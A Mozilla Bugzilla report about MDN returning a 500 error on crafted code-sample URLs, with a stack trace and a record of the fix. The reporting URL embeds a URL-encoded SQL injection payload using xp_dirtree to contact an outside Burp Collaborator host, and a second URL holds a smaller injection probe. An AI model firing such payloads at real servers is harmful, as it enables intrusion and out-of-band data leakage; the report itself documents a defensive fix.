Closed
Bug 1269143
Opened 8 years ago
Closed 8 years ago
500 ISE on some values for $samples
Categories
(developer.mozilla.org :: Security, defect)
Tracking
(Not tracked)
RESOLVED
FIXED
People
(Reporter: jwhitlock, Assigned: rjohnson)
Details
(Whiteboard: [specification][type:bug])
What did you do? ================ A user intentionally or accidentally crafted a URL: https://mdn.mozillademos.org/en-US/docs/IndexedDB/Using_IndexedDB$samples/Full_IndexedDB_example%3Bdeclare%20@q%20varchar(99)%3Bset%20@q%3D'%5C%5C0opnfoykgtyvofgudak3gu07nytphg74ywlm9b.burpcollab'+'orator.net%5Cxrt'%3B%20exec%20master.dbo.xp_dirtree%20@q%3B--%20?key-to-delete=555-555-0199@example.com&pub-biblioid-to-delete=555-555-0199@example.com" What happened? ============== A 500 error occurs when the URL is visited What should have happened? ========================== A 400 Bad Request or other is returned. Is there anything else we should know? ====================================== Stack trace: ValueError: All strings must be XML compatible: Unicode or ASCII, no NULL bytes or control characters File "django/core/handlers/base.py", line 132, in get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "newrelic/hooks/framework_django.py", line 499, in wrapper return wrapped(*args, **kwargs) File "django/views/decorators/http.py", line 45, in inner return func(request, *args, **kwargs) File "kuma/wiki/decorators.py", line 31, in _added_header response = func(request, *args, **kwargs) File "django/views/decorators/clickjacking.py", line 61, in wrapped_view resp = view_func(*args, **kwargs) File "kuma/wiki/decorators.py", line 106, in process return func(request, *args, **kwargs) File "kuma/wiki/views/code.py", line 34, in code_sample data = job.get(document.pk, sample_name) File "cacheback/base.py", line 112, in get result = self.refresh(*args, **kwargs) File "cacheback/base.py", line 226, in refresh result = self.fetch(*args, **kwargs) File "kuma/wiki/jobs.py", line 112, in fetch return document.extract.code_sample(sample_name) File "newrelic/api/function_trace.py", line 110, in literal_wrapper return wrapped(*args, **kwargs) File "kuma/wiki/content.py", line 143, in code_sample sample = pq(src).find('[id="%s"]' % name) File "pyquery/pyquery.py", line 647, in find for child in tag.getchildren()] File "src/lxml/lxml.etree.pyx", line 1587, in lxml.etree._Element.xpath (src/lxml/lxml.etree.c:61854) File "src/lxml/xpath.pxi", line 295, in lxml.etree.XPathElementEvaluator.__call__ (src/lxml/lxml.etree.c:178374) File "src/lxml/apihelpers.pxi", line 1439, in lxml.etree._utf8 (src/lxml/lxml.etree.c:32441)
Reporter | ||
Comment 1•8 years ago
|
||
Also triggered with: https://mdn.mozillademos.org/en-US/docs/Web/HTML/Element/input/checkbox$samples/Example%22)%3B https://sentry.prod.mozaws.net/operations/mdn-prod/issues/327391/
Assignee | ||
Updated•8 years ago
|
Assignee: nobody → rjohnson
Assignee | ||
Comment 2•8 years ago
|
||
Deployed to staging and production.
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Reporter | ||
Comment 3•8 years ago
|
||
The second URL now returns an empty response, but the original URL still raises a 500 error.
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
Reporter | ||
Comment 4•8 years ago
|
||
Both URLs now return empty responses.
Status: REOPENED → RESOLVED
Closed: 8 years ago → 8 years ago
Resolution: --- → FIXED
Reporter | ||
Comment 5•8 years ago
|
||
The test string implies that this security testing suite was used to generate the URL: https://portswigger.net/burp/help/collaborator.html
Reporter | ||
Comment 6•8 years ago
|
||
Fix deployed to production, removing security flag.
Group: websites-security
You need to log in
before you can comment on or make changes to this bug.
Description
•